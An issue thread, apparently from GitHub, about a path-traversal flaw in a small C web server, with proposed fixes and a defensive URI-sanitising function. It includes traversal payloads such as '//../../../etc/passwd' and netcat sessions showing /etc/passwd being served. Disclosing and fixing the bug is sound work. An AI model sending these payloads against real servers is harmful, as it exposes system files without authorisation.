Cotix opened 8 years ago
This can be fixed by changing the lines

```c
if(uri[0] == '/'){
    filename = uri + 1;
```

for

```c
while (filename[0] == '/') { filename = filename+1; }
```

and removing the extra closing brace `}`.
it prevents the //etc/passwd style direct path hack and seems to prevent /../../../etc/passwd style indirect directory hack as well
@timsoftgit does it not still allow the `/../../../etc/passwd` style attack, because the URI ends up being `../../../etc/passwd` style? I suggest you try your suggested fix with the below payload (URI) as well.

```
//../../../etc/passwd
```
You're right. To do it properly you have to filter out all `../` recursively as well, otherwise something like `....//....//etc/passwd` would also be a problem.
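One defensive way to handle all three payloads discussed in this thread (leading `//`, `..` climbing out of the root, and `....//` sequences that defeat a single-pass `../` strip) is to normalise the URI path by segments instead of by string substitution. The function below is an added example, not the server's own code; `sanitize_uri_path` is a hypothetical name, and it assumes the caller joins the returned relative path onto its document root.

```c
#include <stdio.h>
#include <string.h>

/* Lexically normalise a request URI so it can be appended to the document
 * root. Splits the path on '/', drops empty and "." segments, pops one
 * segment on "..", and returns 0 (reject) if ".." would climb above the
 * root. On success writes a relative path with no leading '/' into out and
 * returns 1. Added example; not the server's original code. */
int sanitize_uri_path(const char *uri, char *out, size_t outlen) {
    size_t seg_start[256], seg_len[256], nsegs = 0;
    size_t end = strcspn(uri, "?");      /* ignore any query string */
    size_t i = 0;

    while (i < end) {
        while (i < end && uri[i] == '/') i++;   /* collapses "//" runs */
        size_t start = i;
        while (i < end && uri[i] != '/') i++;
        size_t len = i - start;
        if (len == 0 || (len == 1 && uri[start] == '.')) continue;
        if (len == 2 && uri[start] == '.' && uri[start + 1] == '.') {
            if (nsegs == 0) return 0;           /* would escape the root */
            nsegs--;
            continue;
        }
        if (nsegs == sizeof(seg_len) / sizeof(seg_len[0])) return 0;
        /* "...." is an ordinary file name, not a traversal, so it stays */
        seg_start[nsegs] = start;
        seg_len[nsegs] = len;
        nsegs++;
    }

    size_t used = 0;
    out[0] = '\0';
    for (size_t k = 0; k < nsegs; k++) {
        if (used + seg_len[k] + (k ? 1 : 0) + 1 > outlen) return 0;
        if (k) out[used++] = '/';
        memcpy(out + used, uri + seg_start[k], seg_len[k]);
        used += seg_len[k];
        out[used] = '\0';
    }
    return 1;
}
```

This is a purely lexical check; if the document root may contain symlinks, the server should additionally confirm with `realpath()` that the opened file resolves inside the root.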
It is possible to request parent directories.
```
cotix@lithium:~$ nc localhost 9999
GET /../../../../../etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root:x:0:0:root:/root:/bin/bash
...
```

my whole /etc/passwd
It is also possible to query absolute paths:
```
cotix@lithium:~$ nc localhost 9999
GET //etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root:x:0:0:root:/root:/bin/bash
```